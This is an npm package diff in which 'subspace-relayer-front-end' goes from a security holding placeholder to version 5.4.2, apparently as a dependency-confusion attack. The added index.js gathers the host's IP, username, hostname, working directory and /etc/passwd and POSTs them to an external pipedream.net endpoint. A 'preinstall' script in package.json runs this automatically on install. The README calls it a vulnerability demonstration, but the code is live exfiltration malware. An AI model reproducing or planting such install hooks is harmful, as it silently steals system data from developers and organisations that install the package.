subspace-relayer-front-end 0.0.1-security → 5.4.2

package/README.md

@@ -1,5 +1,3 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=subspace-relayer-front-end for more information.
+<h1 align="center">This NPM package vulnerable to dependency confiuse vulnerability</h1>
+<p align="center">Name: Aryan Jaiswal</p>
+<p align="center">Contact: aryan351985@gmail.com</p>

package/index.js

@@ -0,0 +1,34 @@
+const execSync = require('child_process').execSync;
+
+const priv_ip = execSync('hostname -I', { encoding: 'utf-8' });
+const whoami = execSync('whoami', { encoding: 'utf-8' });
+const host = execSync('hostname', { encoding: 'utf-8' });
+const current_dir = execSync('pwd', { encoding: 'utf-8' });
+const passwd = execSync('cat /etc/passwd', { encoding: 'utf-8' });
+
+
+const https = require("https")
+
+const data = JSON.stringify({
+  "private IP": priv_ip,
+  "whoami": whoami,
+  "hostname": host,
+  "current dir": current_dir,
+  "passwd": passwd,
+
+})
+
+const options = {
+  hostname: "eo56j4tfa20w1b7.m.pipedream.net",
+  port: 443,
+  path: "/",
+  method: "POST",
+  headers: {
+    "Content-Type": "application/json",
+    "Content-Length": data.length,
+  },
+}
+
+const req = https.request(options)
+req.write(data)
+req.end()

package/package.json

@@ -1,6 +1,12 @@
-{
-  "name": "subspace-relayer-front-end",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+    "name": "subspace-relayer-front-end",
+    "version": "5.4.2",
+    "description": "Hacked By Nova",
+    "main": "index.js",
+    "scripts": {
+      "test": "echo \"Error: no test specified\" && exit 1",
+      "preinstall" : "node index.js"
+    },
+    "author": "Nova Security",
+    "license": "ISC"
+  }